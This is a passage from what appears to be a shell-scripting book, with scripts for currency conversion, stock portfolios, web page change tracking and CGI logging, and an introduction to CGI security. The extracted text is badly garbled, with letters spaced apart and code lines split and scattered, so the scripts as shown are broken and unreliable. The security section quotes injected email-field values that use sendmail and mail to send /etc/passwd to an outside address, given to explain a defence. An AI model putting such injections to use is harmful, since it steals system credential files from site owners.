a two-part task, because the latest exchange rates should be cached, but that cache needs to be refreshed every day
or two so that the rates stay reasonably up-to-date for the calculations.
Hence this solution is split into two scripts. The first script gets the exchange rate from CNN's money and finance
website (h ttp : //mo n ey.c n n.co m/) and saves it in a temporary cache file called . e x c h a n g e r a t e . The
second script provides the user interface to the exchange rate information and allows easy calculation of currency
conversions.

The Code
# ! / b in /s h
#
#
#
#
#
#
#

g e te xc hra t e - S crap e s th e c u r r e n t c u r r e n c y e x c h a n g e r a t e s
fr om CN N 's m o ney a nd f ina n c e w e b s i t e .
W i th ou t
c u rr en t
s u cc es s
y o u ru n

a n y fl a gs, t his gra b s t h e e x c h a n g e r a t e v a l u e s i f t h e


i n form a tion is m ore t h a n 1 2 h o u r s o l d . I t a l s o s h o w s
u p on c o mple t ion, so m e t h i n g t o t a k e i n t o a c c o u n t i f
t h is f r om a cron jo b .

u r l = "h tt p:/ / mone y .cnn . com/ mar k e t s / c u r r e n c i e s / c r o s s c u r r . h t m l "


a g e = "+ 72 0"
# 12 h ours , i n m i n u t e s
o u t f =" /t mp/ . exch a nger a te"
# D o w e nee d the new e xcha nge r a t e v a l u e s ? L e t ' s c h e c k t o s e e :
# I f t he fi l e is less than 12 h o u r s o l d , t h e f i n d f a i l s . . .
i f [ - f $ou t f ] ; the n
i f [ - z " $ (fin d $ou t f -c min $ a g e - p r i n t ) " ] ; t h e n
ec ho "$ 0 : ex c hang e rat e d a t a i s u p - t o - d a t e . " > & 2
ex it 1
fi
fi
# A c tu al ly g et t h e la t est exc h a n g e r a t e s , t r a n s l a t i n g i n t o t h e
# f o rm at re q uire d by t he e xch a n g e r a t e s c r i p t .
l y n x - du mp ' http : //mo n ey.c nn. c o m / m a r k e t s / c u r r e n c i e s / c r o s s c u r r . h t m l ' | \
g r ep - E ' ( Japa n |Eur o |Can |UK ) ' | \
a w k '{ if (NF = = 5 ) { p rin t $ 1 " = " $ 2 } } ' | \
t r ' [: upp e r:]' '[:l o wer: ]' | \
s e d 's /do l lar/ c and/ ' > $ out f
e c h o " Su cce s s. E x chan g e ra tes u p d a t e d a t $ ( d a t e ) . "
exit 0
The other script that's important for this to work is e x c h a n g e r a t e , the actual command users invoke to calculate
currency conversions:
# ! / b in /s h
# e x ch an ger a te - Give n a c urr e n c y a m o u n t , c o n v e r t s i t i n t o o t h e r m a j o r
#
cu rr enc i es a n d sh o ws t he e q u i v a l e n t a m o u n t s i n e a c h .
# r e f UR L: h ttp: / /mon e y.cn n.c o m / m a r k e t s / c u r r e n c i e s /
s h o w ra te ()
{
d o ll ar s=" $ (ech o $1 | cut -d . - f 1 ) "
c e nt s= "$( e cho $ 1 | c ut - d. - f 2 | c u t - c 1 - 2 ) "
r a te =" $do l lars . ${ce n ts:- 00} "
}
e x c h ra te fil e ="/t m p/.e x chan ger a t e "
s c r i pt bc ="s c ript b c -p 30"
# tweak this as needed
. $ e xc hr ate f ile
# T h e 0. 000 0 0000 0 1 co m pens ate s f o r a r o u n d i n g e r r o r b u g i n

# m a ny v ers i ons o f bc , whe re 1 ! = 0 . 9 9 9 9 9 9 9 9 9 9 9 9 9 9


u s e ur o= "$( $ scri p tbc
u s c an d= "$( $ scri p tbc
u s ye n= "$( $ scri p tbc
u s p o un d= "$( $ scri p tbc

1
1
1
1

/
/
/
/

$ eur o
$ can a d a
$ jap a n
$ uk

+
+
+
+

0.000000001)"
0.000000001)"
0.000000001)"
0.000000001)"

i f [ $ # -ne 2 ] ; the n
e c ho " Usa g e: $ ( base n ame $0) a m o u n t c u r r e n c y "
e c ho " Whe r e cu r renc y can be U S D , E u r o , C a n a d i a n , Y e n , o r P o u n d . "
e x it 0
fi
a m o u nt =$ 1
c u r r en cy ="$ ( echo $2 | tr ' [:u p p e r : ] ' ' [ : l o w e r : ] ' | c u t - c 1 - 2 ) "
c a s e $ cu rre n cy i n
u s |d o ) i f [ - z "$( e cho $1 | g r e p ' \ . ' ) " ] ; t h e n
mast e rrat e ="$1 .00 "
e l se
mast e rrat e ="$1 "
fi
eu
) m a ster r ate= " $($s cri p t b c $ 1 \ * $ e u r o ) "
c a |c d ) m a ster r ate= " $($s cri p t b c $ 1 \ * $ c a n a d a ) "
ye
) m a ster r ate= " $($s cri p t b c $ 1 \ * $ j a p a n ) "
p o |s t ) m a ster r ate= " $($s cri p t b c $ 1 \ * $ u k ) "
* ) e c ho " $ 0: u n know n c u r r e n c y s p e c i f i e d . "
e c ho " I onl y kno w U S D , E U R O , C A N D / C D N , Y E N a n d
ex i t 1
esac

;;
;;
;;
;;
;;
GBP/POUND."

e c h o " Cu rre n cy E x chan g e Ra te E q u i v a l e n t s f o r $ 1 $ { 2 } : "


s h o w ra te $m a ster r ate
echo "
US D o llar s : $r ate "
s h o w ra te $( $ scri p tbc $ mast err a t e \ * $ u s e u r o )
echo "
EC Euro s : $r ate "
s h o w ra te $( $ scri p tbc $ mast err a t e \ * $ u s c a n d )
e c h o " Ca nad i an D o llar s : $r ate "
s h o w ra te $( $ scri p tbc $ mast err a t e \ * $ u s y e n )
echo "
J a pane s e Ye n : $r ate "
s h o w ra te $( $ scri p tbc $ mast err a t e \ * $ u s p o u n d )
echo "
Br i tish Poun d s: $ rat e "
exit 0

How It Works
When run, if the exchange rate database .e x c h a n g e r a t e is more than 12 hours out-of-date, the first script,
g e t e xc hr ate , grabs the latest exchange rate information from the CNN site, extracts the exchange rates for the
major currencies specified in the script, and then saves them in a c u r r e n c y = v a l u e format. Here's how the
.ex c ha ng era t e data file appears after the script is run:
$ c a t /t mp/ . exch a nger a te
c a n a da =0 .74 7 100
e u r o =1 .1 733 0 0
j a p a n= 0. 009 1 63
u k = 1 .6 64 400
The second script, exc h ange r ate, is rather long and relies on Script #9, s c r i p t b c , for all of the mathematics
involved. The basic algorithm of the script is to normalize the currency value specified in the command arguments to
U.S. dollars by multiplying the specified value by the appropriate exchange rate, and then to use the relationship
between the U.S. dollar and each foreign currency to calculate the equivalent value in each currency.
From a scripting point of view, note particularly how e x c h a n g e r a t e incorporates the exchange rate values from the
. e x c ha ng era t e data file:
. $ e xc hr ate f ile
This is known as sourcing a file, and it causes the specified file (script) to be read as if its contents were part of this
script. This will make more sense if we contrast it with the result of the following line:
s h $ ex ch rat e file
This does exactly the wrong thing: It spawns a subshell, sets the exchange rate variables within that subshell, and then
quits the subshell, leaving the calling script without access to the values for these variables.

Running the Script

Running the Script


This pair of scripts is typical of sophisticated Unix interaction, with g e t e x c h r a t e being the one "admin" script doing
the necessary back-end work to ensure that the exchange rate data is correct and up-to-date, and e x c h a n g e r a t e
being the "user" script that has all the proverbial bells and whistles but doesn't touch the Internet at all.
Although the get ex chr a te script can be run as frequently as desired, it actually gets and updates the currency
exchange rates only if $ex ch rate file is more than 12 hours old. This lends itself to being a daily c r o n job,
perhaps just during week-days (the currency markets aren't open on weekends, so the rates don't fluctuate from Friday
evening to Monday morning).
The e xc ha nge r ate script expects two arguments: a currency amount and a currency name. It's flexible in this
regard, so 100 CDN and 100 Canadian are the same, while 25 EU and 25 Euros will also both work. If no currency
name is specified, the default is USD, U.S. dollars.

The Results
$ g e te xc hra t e
S u c c es s. Ex c hang e rat e s up dat e d a t
$ e x ch an ger a te 2 5 0 ye n
C u r r en cy Ex c hang e Rat e Equ iva l e n t s
US Do l lars : 2.2 9
EC E uros : 1.9 5
C a n a di an Do l lars : 3.0 6
Ja pa nes e Yen : 250 . 00
B ri ti sh P ound s : 1. 3 7
$ e x ch an ger a te 2 5 0 po u nds
C u r r en cy Ex c hang e Rat e Equ iva l e n t s
US Do l lars : 416 . 05
EC E uros : 354 . 44
C a n a di an Do l lars : 556 . 96
Ja pa nes e Yen : 453 9 5.52
B ri ti sh P ound s : 25 0 .00
$ e x ch an ger a te 2 5 0 do l lars
C u r r en cy Ex c hang e Rat e Equ iva l e n t s
US Do l lars : 250 . 00
EC E uros : 212 . 98
C a n a di an Do l lars : 334 . 67
Ja pa nes e Yen : 272 7 7.68
B ri ti sh P ound s : 15 0 .22

Thu Oct

9 23:07:27 MDT 2003.

for 250 yen:

for 250 pounds:

for 250 dollars:

Hacking the Script


Within a network, a single system could poll the CNN site for up-to-date exchange values and push the
$ e x c hr at efi l e out to workstations on the system (perhaps with an f t p s y n c d o w n script like that shown in
Script #81). The e xcha n gera t e script is then all that's installed on individual systems to enable this useful
functionality.
You could cobble together a web-based interface to the exchange rate script by having a page that has a text input
field for the desired amount and a pop-up menu of currency types. Submit it, turn those two data snippets into the
appropriate input format for the e xcha nger a t e script, and then feed the output back to the web browser with the
appropriate HTML wrapper.

#67 Tracking Your Stock Portfolio


A more complex task for the shell is to keep track of the overall value of your stock portfolio. While this might actually
be too depressing to see each time you log in, the building blocks are quite informative and valuable on their own.
Like Script #66, this solution is built from two different scripts, one that extracts the most recently traded value of a
given stock, and a second script that reads and calculates running totals for a portfolio of stocks.

The Code
# !/ bin / sh
# g ets t ock - Gi ve n a stoc k tic k er s y mbo l , r et ur n s it s c u rr en t v al u e
#
f r om th e L yc os w ebsi te.
u rl ="h t tp: // fin an ce.l ycos .com/ q c/s t o cks / q uo te s. a sp x? s ym b ol s= "
i f [ $ # -n e 1 ] ; the n
e cho "Us ag e: $( base name $0) s toc k s ymb o l " >& 2
e xit 1
fi
v al ue= " $(l yn x - du mp " $url $1" | gre p 'La s t p ri ce : ' | \
a wk - F: 'N F > 1 && $(NF ) != " N/A " { p r i nt $ (N F ) }' ) "
i f [ - z $v al ue ] ; th en
e cho "er ro r: no val ue f ound f or t i cke r sy mb ol $1 ." >& 2
e xit 1
fi
e ch o $ v alu e
e xi t 0
The second script is the wrapper that allows users to create a rudimentary data file with stock name, stock ticker
symbol, and the number of shares held, and then have the valuation of their entire portfolio calculated based on the
latest (well, 15-minute-delayed) quotes for each stock in the file:
# !/ bin / sh
# p ort f oli o - C al cula tes the v a lue o f e a c h st oc k i n y ou r h ol d in gs ,
#
th e n c al cul at es t he v alue o f y o u r o v e ra ll p o rt fo l io , b as e d on
#
th e la te st st ock mark et po s iti o n .
s cr ipt b c=" $H OME /b in/s crip tbc"
# t w eak t hi s as ne ed e d
p or tfo l io= "$ HOM E/ .por tfol io"
i f [ ! -f $p ort fo lio ] ; then
e cho "$( ba sen am e $0 ): N o por t fol i o to c he ck ? ( $p or t fo l io )" >& 2
e xit 1
fi
w hi le r ead h old in g
do
ev a l $ (e cho $ hold ing | \
awk - F\| ' {pri nt " name= \ ""$ 1 " \"; t ic ke r= \ "" $2 " \" ; h ol d =\ "" $ 3" \" " }' )
if [ ! - z " $t icke r" ] ; th e n
v alu e= "$( ge tsto ck $ ticke r )"
t otv al ="$ ($ scri ptbc ${va l ue: - 0 } \ * $h ol d) "
e cho " $na me is trad ing a t $v a l ue ( y ou r $h o ld s h ar e s = $ to tv a l) "
s umv al ue= "$ ($sc ript bc ${ s umv a l ue: - 0 } + $t o tv al ) "
fi
d one < $ p ort fo lio
e ch o " T ota l por tf olio val ue: $ s umv a l ue"
e xi t 0

How It Works
The get s toc k script is one of the most straightforward in this chapter. It emulates a m et h od =g e t query to Lycos
Finance and then extracts the value of a single stock specified as the command argument by finding the line in the web
page that indicates "Last Price:" and extracting the subsequent price.
The wrapper script p or tfo li o calculates the value of all stocks in a portfolio, using the information stored in the
portfolio data file, which is organized as a simple text file with stock name, ticker symbol, and the number of shares
held. For parsing simplicity, the data file fields are separated by a | symbol, a character that's not likely to show up in a
company name. The po rt foli o script extracts the value of each these fields, calculates the current value of each
stock by calling g et sto ck , and then multiplies that by the shares held to ascertain the total value of that stock. Sum
them up, and you have the portfolio value.
The eva l command on the first line of the wh i l e loop in p ort f ol i o is the trickiest element of the script:
e va l $ ( ech o $ho ld ing | \
awk - F\| ' {pri nt " name= \ ""$ 1 " \"; t ic ke r= \ "" $2 " \" ; h ol d =\ "" $ 3" \" " }' )
Within the subshell, aw k parses a line from the portfolio database, splitting it into three fields, and then outputs them in
n am e=v a lue format. Then the call to eval , within which the a w k call is contained, forces the script to evaluate the
a wk output as if it were entered directly into the shell. For example, for the Apple holdings in the portfolio shown in the
next section, the subshell result would be
n am e=" A ppl e Com pu ter" ; ti cker= " AAP L " ; h o l d= "5 00 "
Once evaluated by e va l, the three variables na m e , t i cke r , and ho ld would then actually be instantiated with the
values specified. The rest of the script can then reference these three values by name, without any additional fiddling.

Running the Script


The get s toc k script isn't intended to be run directly, though given a stock ticker symbol, it'll return the current
trading price. The p or tfo li o script requires a separate data file that contains stock name, stock ticker symbol, and
the number of shares held. Here's a sample of how that might look:
$ c at ~ /.p or tfo li o
# f orm a t i s com pa ny n ame, tick e r s y m bol , ho ld in g s
A pp le C omp ut er| AA PL|5 00
C ab le & Wi re les s| CWP| 100
I nt el| I NTC |3 00
J up ite r Me di a|J UP M|50
e Ba y|E B AY| 20 0
M ic ros o ft| MS FT| 20 0
Q ua lco m m|Q CO M|1 00

The Results
$ p ort f oli o
A pp le C omp ut er is tra ding at 2 2 .61 ( you r 50 0 sh a re s = 1 1 30 5. 0 0)
C ab le & Wi re les s is t radi ng at 5.6 3 (yo u r 1 00 s h ar es = 5 63 .0 0 )
I nt el i s t ra din g at 2 8.59 (you r 30 0 sha r e s = 85 7 7. 00 )
J up ite r Me di a i s trad ing at 3. 9 5 ( y o ur 5 0 s ha re s = 1 9 7. 5 0)
e Ba y i s tr ad ing a t 55 .41 (your 200 s har e s = 1 10 8 2. 00 )
M ic ros o ft is tr ad ing at 2 6.52 ( you r 200 s ha re s = 5 30 4 .0 0 )
Q ua lco m m i s tra di ng a t 41 .33 ( y our 1 00 s h ar es = 41 33 . 00 )
T ot al p ort fo lio v alue : 41 161.5 0

Hacking the Script


Obvious areas for improvement would be to add support for overseas exchange holdings, to allow dynamic lookup of
ticker symbols by specifying specific stock names, and if you're a real gambler who can handle seeing your
occasional losses to include the original purchase price for each stock as a fourth field in the portfolio file and then
compute not only the current portfolio value but the difference in value against the original purchase price of each stock
in the portfolio.

#68 Tracking Changes on Web Pages


Sometimes great inspiration comes from seeing an existing business and saying to yourself, "That doesn't seem too
hard." The task of tracking changes on a website is a surprisingly simple way of collecting such inspirational material,
as shown in this script, ch a ngetr ack. This script does have one interesting nuance: When it detects changes to the
site, it emails the new web page, rather than just reporting it on the command line.

The Code
# ! / b in /s h
# c h an ge tra c k - T rack s a g ive n U R L a n d , i f i t ' s c h a n g e d s i n c e t h e l a s t
#
v is it, emai l s th e new pa g e t o t h e s p e c i f i e d a d d r e s s .
s i t e ar ch ive = "/us r /tmp / chan get r a c k "
s e n d ma il ="/ u sr/s b in/s e ndma il"
f r o m ad dr ="w e bscr a per@ i ntui tiv e . c o m "

# change as desired
# might need to be tweaked!
# change as desired

i f [ $ # -ne 2 ] ; the n
e c ho " Usa g e: $ ( base n ame $0) u r l e m a i l " > & 2
e x it 1
fi
i f [ ! - d $ s itea r chiv e ] ; th e n
i f ! m kdi r $si t earc h ive ; t h e n
ec ho "$ ( base n ame $ 0) f ail e d : c o u l d n ' t c r e a t e $ s i t e a r c h i v e . " > & 2
ex it 1
fi
c h mo d 777 $sit e arch i ve
# you might change this for privacy
fi
i f [ " $( ech o $1 | cut -c1- 5)" ! = " h t t p : " ] ; t h e n
e c ho " Ple a se u s e fu l ly q ual i f i e d U R L s ( e . g . , s t a r t w i t h ' h t t p : / / ' ) " > & 2
e x it 1
fi
f n a m e= "$ (ec h o $1 | se d 's/ htt p : \ / \ / / / g ' | t r ' / ? & ' ' . . . ' ) "
b a s e ur l= "$( e cho $ 1 | c ut - d/ - f 1 - 3 ) / "
# G r ab a co p y of the w eb p age i n t o a n a r c h i v e f i l e . N o t e t h a t w e c a n
#
t ra ck ch a nges by l o okin g j u s t a t t h e c o n t e n t ( e . g . , ' - d u m p ' , n o t
# ' - so ur ce' ) , so we c a n sk ip a n y H T M L p a r s i n g . . .
l y n x - du mp " $1" | uni q > $ sit e a r c h i v e / $ { f n a m e } . n e w
i f [ - f $si t earc h ive/ $ fnam e ] ; t h e n
# We 'v e s e en t h is s i te b efo r e , s o c o m p a r e t h e t w o w i t h ' d i f f '
i f d if f $ s itea r chiv e /$fn ame $ s i t e a r c h i v e / $ { f n a m e } . n e w > / d e v / n u l l ; t h e n
ec ho "S i te $ 1 has chan ged s i n c e o u r l a s t c h e c k . "
e l se
rm - f $ s itea r chiv e /${f nam e } . n e w
# nothing new...
ex it 0
# no change, we're outta here
fi
else
e c ho " Not e : we ' ve n e ver see n t h i s s i t e b e f o r e . "
fi
# F o r th e s c ript to g e t he re, t h e s i t e m u s t h a v e c h a n g e d , a n d w e n e e d t o s e n d
# t h e co nte n ts o f the .new fi l e t o t h e u s e r a n d r e p l a c e t h e o r i g i n a l w i t h t h e
# . n ew f or t he n e xt i n voca tio n o f t h e s c r i p t .
( e c ho
e c ho
e c ho
e c ho
e c ho

" Con t ent- t ype: text /ht m l "


" Fro m : $f r omad d r (W eb S i t e C h a n g e T r a c k e r ) "
" Sub j ect: Web S ite $1 H a s C h a n g e d "
" To: $2"
""

l y nx - sou r ce $ 1 | \
se d -e " s|[s S ][rR ] [cC] =\" | S R C = \ " $ b a s e u r l | g " \
-e " s|[h H ][rR ] [eE] [fF ] = \ " | H R E F = \ " $ b a s e u r l | g " \
-e " s|$b a seur l \/ht tp: | h t t p : | g "
) | $s en dma i l -t

# U p da te th e sav e d sn a psho t o f t h e w e b s i t e
m v $ si te arc h ive/ $ {fna m e}.n ew $ s i t e a r c h i v e / $ f n a m e
c h m o d 77 7 $ s itea r chiv e /$fn ame
# a n d we 're done .
exit 0

How It Works
Given a website URL and a destination email address, this script grabs the URL's web page content and compares it
against the content of the site from the previous check.
If it's changed, the new web page is emailed to the specified recipient, with some simple rewrites to try to keep the
graphics and H REFs working. These HTML rewrites are worth examining:
l y nx - sou r ce $ 1 | \
se d -e " s|[s S ][rR ] [cC] =\" | S R C = \ " $ b a s e u r l | g " \
-e " s|[h H ][rR ] [eE] [fF ] = \ " | H R E F = \ " $ b a s e u r l | g " \
-e " s|$b a seur l \/ht tp: | h t t p : | g "
The call to lyn x retrieves the source of the specified web page, and then s e d performs three different translations.
S R C = " is rewritten as S R C="b a seur l/ to ensure that any relative pathnames of the nature S R C = " l o g o . g i f "
are rewritten to work properly as full pathnames with the domain name. If the domain name of the site is
h t t p :/ /w ww. i ntui t ive. c om/, the rewritten HTML would be:
S R C = "h tt p:/ / www. i ntui t ive. com / l o g o . g i f " . H R E F attributes are similarly rewritten, and then, to
ensure we haven't broken anything, the third translation pulls the b a s e u r l back out of the HTML source in situations
where it's been erroneously added. For example,
H R E F =" ht tp: / /www . intu i tive .co m / h t t p : / / w w w . some-whereelse. c o m / l i n k " is clearly broken and
must be fixed for the link to work.
Notice also that the recipient address is specified in the e c h o statement (e c h o " T o : $ 2 " ) rather than as an
argument to s e ndma i l. This is a simple security trick: By having the address within the s e n d m a i l input stream
(which se nd mai l knows to parse for recipients because of the - t flag), there's no worry about users playing games
with addresses like "j o e;ca t /et c/pas s w d | m a i l l a r r y " . It's a good technique to use for all invocations
of s e nd mai l within shell scripts.

Running the Script


This script requires two parameters: the URL of the site being tracked (and you'll need to use a fully qualified URL that
begins with h t tp:/ / for it to work properly) and the email address of the person or comma-separated group of
people who should receive the updated web page, as appropriate.

The Results
The first time the script sees a web page, the page is automatically mailed to the specified user:
$ c h an ge tra c k ht t p:// w ww.i ntu i t i v e . c o m / b l o g / t a y l o r @ i n t u i t i v e . c o m
N o t e : we 've neve r see n thi s s i t e b e f o r e .
The resultant emailed copy of the site, while not exactly as it would appear in the web browser, is still quite readable,
as shown in Figure 7-2.

Figure 7-2: The site has changed, so the page is sent via email from c h a n g e t r a c k
All subsequent checks of h tt p:// www.i n t u i t i v e . c o m / b l o g / will produce an email copy of the site only if
the page has changed since the last invocation of the script. This change can be as simple as a single value or as
complex as a complete redesign. While this script can be used for tracking any website, sites that don't change
frequently will probably work best: If the site changes every few hours (such as the CNN home page), checking for
changes is a waste of CPU cycles, because it'll always be changed.
When the script is invoked the second time, nothing has changed, and so it has no output and produces no electronic
mail to the specified recipient:
$ c h an ge tra c k ht t p:// w ww.i ntu i t i v e . c o m / b l o g / t a y l o r @ i n t u i t i v e . c o m
$

Hacking the Script


There are a lot of ways you can tweak and modify this script to make it more useful. One change could be to have a
"granularity" option that would allow users to specify that if only one line has changed, don't consider it updated.
(Change the invocation of d iff to pipe the output to w c - l to count lines of output changed to accomplish this
trick.)
This script is also more useful when invoked from a c r o n job on a daily or weekly basis. I have similar scripts that run
every night and send me updated web pages from various sites that I like to track. It saves lots of time-wasting surfing!
Most interesting of the possible hacks is to modify this script to work off a data file of URLs and email addresses,
rather than requiring those as input parameters. Drop that modified version of the script into a c r o n job, write a webbased front end to the utility, and you've just duplicated a function that some companies charge people money to use
on the Web. No kidding.
Another way to track changes

There's another way to track web page changes that's worth a


brief mention: RSS. Known as Really Simple Syndication,
RSS-enabled web pages have an XML version of the site that
makes tracking changes trivial, and there are a number of
excellent RSS trackers for Windows, Mac, and Linux/Unix. A
good place to start learning about RSS is
http://rss.intuitive.com/. The vast majority of sites aren't RSS
enabled, but it's darn useful and worth keeping an eye on!

Chapter 8: Webmaster Hacks


Overview
In addition to offering a great environment for building nifty command-line-based tools that work with various Internet
sites, shell scripts can also change the way your own website works, starting with some simple debugging tools and
expanding to the creation of web pages on demand, a photo album browser that automatically incorporates new
images uploaded to the server, and more.
All of these uses of the shell for Common Gateway Interface (CGI) scripts share one common trait, however: They
require you to be conscious and aware of possible security risks. The most common hack that can catch an unaware
web developer is the exploitation of the command line, accessed within the scripts.
Consider this seemingly benign example: On a web page, you have a form for people to fill out. One of the fields is
their email address, and within your script you not only store their information within a local database, you also email
them an acknowledgment:
( e c ho " Sub j ect: Than k s fo r y o u r s i g n u p "
e c ho " To: $ema i l ($ n ame) "
e c ho " "
e c ho " Tha n ks f o r si g ning up . Y o u ' l l h e a r f r o m u s s h o r t l y . "
e c ho " -- D ave a nd t h e te am"
) | se nd mai l $em a il
Seems innocent, doesn't it? Now imagine what would happen if the email address, instead of
<t a yl or @in t uiti v e.co m >, was entered as
' s e n dm ai l d 0 0d37 @ das- h ak.d e < / e t c / p a s s w d ; e c h o

taylor@intuitive.com'

Can you see the danger lurking in that? Rather than just sending the short email to the address, this sends a copy of
your / et c/p a sswd file to a delinquent at @ d a s - h a k . d e , to perhaps use as the basis of a determined attack on
your system security.
As a result, many CGI scripts are written in more security-conscious environments, notably including the - w -enabled
Perl world, in which the script fails if data is utilized from an external source without being "scrubbed" or checked.
But this lack of security features doesn't preclude shell scripts from being equal partners in the world of web security. It
just means that you need to be thoughtful and conscious of where problems might creep in and eliminate them. For
example, a tiny change in the script just shown would prevent any potential hooligans from providing bad external data:
( e c ho " Sub j ect: Than k s fo r y o u r s i g n u p "
e c ho " To: $ema i l ($ n ame) "
e c ho " "
e c ho " Tha n ks f o r si g ning up . Y o u ' l l h e a r f r o m u s s h o r t l y . "
e c ho " -- D ave a nd t h e te am"
) | se nd mai l -t
The - t flag to s e ndma i l tells the program to scan the message itself for valid destination email addresses. The
backquoted material never sees the light of a command line, as it's interpreted as an invalid email address within the
s e n d ma il queuing system (and then safely ends up in a log file).
Another safety mechanism requires that information sent from the web browser to the server be encoded; a backquote,
for example, would actually be sent to the server (and handed off to the CGI script) as % 6 0 , which can certainly be
safely handled by a shell script without danger.
One common characteristic of all the CGI scripts in this chapter is that they do very, very limited decoding of the
encoded strings: Spaces are encoded with a + for transmission, so translating them back to spaces is safe. The @
character in email addresses is sent as %40 , so that's safely transformed back too. Other than that, the scrubbed
string can safely be scanned for the presence of a % and generate an error if encountered. This is highlighted in the
code used in Script #72, Processing Contact Forms.
Ultimately, highly sophisticated websites will use more robust and powerful tools than the shell, but as with many of the
solutions in this book, a 20-to 30-line shell script can often be enough to validate an idea, prove a concept, or solve a
simple problem in a fast, portable, and reasonably efficient manner.
Try them online!

You can explore many of the scripts in this chapter online at


ht tp:// w w w . i n t u i t i v e . c o m / w i c k e d /

Running the Scripts in This Chapter


To run any of the CGI shell scripts presented in this chapter, you'll need to do a bit more than just name the script
appropriately and save it. You must also place the script in the proper location, as determined by the configuration of
the web server running on your system.
Unless you've specifically configured your web browser to run .sh scripts as CGI programs, you'll want all of the
scripts in this chapter to have a . cgi filename suffix. You should save the . cg i files either in the desired directory
on your web server or in its / cgi- bin/ directory, again depending on the configuration. It is important to note that
the . cgi file-naming conventions in this chapter assume that you are saving those files in your web server's root
directory. If you are instead saving them in its / cgi - b in/ directory, you must add /c g i- bi n / to all of the script
paths in this chapter. For example, s crip t- na m e .cg i becomes / c gi -b i n/ s c ri pt - na me . cg i. Finally,
you'll need to ensure that each .c gi script is readable and executable by everyone, because on most web servers
your web queries run as user nob ody or similar.
Of course, you need a web server running to have any of these scripts work properly. Fortunately, just about every
cool modern OS includes either Apache or something similar, so getting a server up and running should be
straightforward. You will need to ensure that the script directory on your web server has CGI execution permission in
the server configuration file. In Apache, for example, the directory needs to have Op t io n E xe cC G I specified in the
h tt pd. c onf file for the scripts to work. Then ensure that the directory is globally readable and executable.
Of course, the alternative is to experiment with these scripts on a web server that is not on your machine but that is
already hopefully set up properly. Talk with your web hosting provider; you'll need access to a web server that not
only allows you to execute your own CGI scripts but also allows you to t el ne t or (preferably) ss h into the server to
tweak the scripts. Most hosting companies do not allow this access, due to security concerns, but you can find a bunch
of possibilities by searching Google for "web hosting ssh telnet access."

#69 Seeing the CGI Environment


Sometimes scripts can be quite simple and still have useful results. For example, while I was developing some of the
scripts for this chapter, Apple released its Safari web browser. My immediate question was, "How does Safari identify
itself within the HT TP_ US ER_A GENT string?"
Finding the answer is quite a simple task for a CGI script, a script that can be written in the shell.

The Code
# !/ bin / sh
# s how C GIe nv - Di spla ys t he CG I ru n t ime e nv ir on m en t, as gi ve n t o a ny
#
C G I s cr ipt o n th is s ystem .
e ch o " C ont en t-t yp e: t ext/ html"
e ch o " "
# N ow t he re al in form atio n
e ch o " < htm l> <bo dy bgc olor =\"wh i te\ " > <h2 > C GI R un t im e E nv i ro nm e nt </ h 2> "
e ch o " < pre >"
e nv || pri nt env
e ch o " < /pr e> "
e ch o " < h3> In put s trea m is :</h3 > "
e ch o " < pre >"
c at e ch o " ( end o f i np ut s trea m)</p r e>< / b ody > < /h tm l> "
e xi t 0

How It Works
When a query comes from a web client to a web server, the query sequence includes a number of environment
variables that the web server (Apache, in this instance) hands to the script or program specified (the so-called
Common Gateway Interface). This script displays this data by using the shell e nv command, with the rest of the script
being necessary wrapper information to have the results fed back through the web server to the remote browser.

Running the Script


To run this code, you need to have the script executable and located on your web server. (See the earlier section
"Running the Scripts in This Chapter" for more details.) Then simply request the saved . cg i file within a web browser.

The Results

Figure 8-1: The CGI runtime environment, from a shell script

#70 Logging Web Events


A cool use of a shell-based CGI script is to log events by using a wrapper. Suppose that I'd like to have a Yahoo!
search box on my web page, but rather than feed the queries directly to Yahoo!, I'd like to log them first, to build up a
database of what people seek from my site.
First off, a bit of HTML and CGI: Input boxes on web pages are created inside forms, and forms have user information
to be processed by sending that information to a remote program specified in the value of the form's action attribute.
The Yahoo! query box on any web page can be reduced to the following:
< fo rm m eth od ="g et " ac tion ="htt p :// s e arc h . ya ho o. c om /b i n/ s ea rc h ">
S ea rch Yah oo :
< in put typ e= "te xt " na me=" p">
< in put typ e= "su bm it" valu e="se a rch " >
< /f orm >
However, rather than hand the search pattern directly to Yahoo!, we want to feed it to a script on our own server,
which will log the pattern and then redirect the query along to the Yahoo! server. The form therefore changes in only
one small regard: The a ct ion field becomes a local script rather than a direct call to Yahoo!:
< !- - T w eak a cti on val ue i f scr i pt i s pl a c ed i n / cg i- b in / o r o th er -- >
< fo rm m eth od ="g et " ac tion ="log - yah o o -se a r ch .c gi " >
The log - yah oo -se ar ch.c gi script is remarkably simple, as you will see.

The Code
# !/ bin / sh
# l og- y aho o- sea rc h - Give n a s e arc h req u e st , lo g s th e p a tt er n , th e n
#
f e eds t he en tire seq uence to t h e r e a l Ya ho o ! se a rc h s ys t em .
# M ake sur e the d irec tory path and f ile l is te d a s 'l o gf i le ' a re w r it ab l e by
# u ser nob od y, or wha teve r use r yo u hav e as y ou r w eb se r ve r u id .
l og fil e ="/ va r/w ww /wic ked/ scrip t s/s e a rch l o g. tx t"
i f [ ! -f $l ogf il e ] ; th en
t ouc h $l og fil e
c hmo d a+ rw $l og file
fi
i f [ - w $l og fil e ] ; then
e cho "$( da te) : $QUE RY_S TRING " | s e d ' s / p= // g; s /+ / / g' >> $ l og fi l e
fi
e ch o " L oca ti on: h ttp: //se arch. y aho o . com / b in /s ea r ch ?$ Q UE R Y_ ST R IN G"
e ch o " "
e xi t 0

How It Works
The most notable elements of the script have to do with how web servers and web clients communicate. The
information entered into the search box is sent to the server as the variable Q UE R Y_ ST R IN G, encoded by replacing
spaces with the + sign and other non-alphanumeric characters with the appropriate character sequences. Then, when
the search pattern is logged, all + signs are translated back to spaces safely and simply, but otherwise the search
pattern is not decoded, to ensure that no tricky hacks are attempted by users. (See the introduction to this chapter for
more details.)
Once logged, the web browser is redirected to the actual Yahoo! search page with the Lo ca t io n: ht tp header
value. Notice that simply appending ?$Q UERY _ S TRI N G is sufficient to relay the search pattern, however simple or
complex it may be, to its final destination.
The log file produced by this script has each query string prefaced by the current date and time, to build up a data file
that not only shows popular searches but can also be analyzed by time of day, day of week, month of year, and so
forth. There's lots of information that this script could mine on a busy site!

Running the Script


To run this script, you need to create the HTML form, as shown earlier, and you need to have the script executable and
located on your server. (See the earlier section "Running the Scripts in This Chapter" for more details.) Then simply
submit a search query to the form, perhaps "nostarch." The results are from Yahoo!, exactly as expected, as shown in
Figure 8-2.

Figure 8-2: Yahoo! search results appear, but the search was logged!

The Results
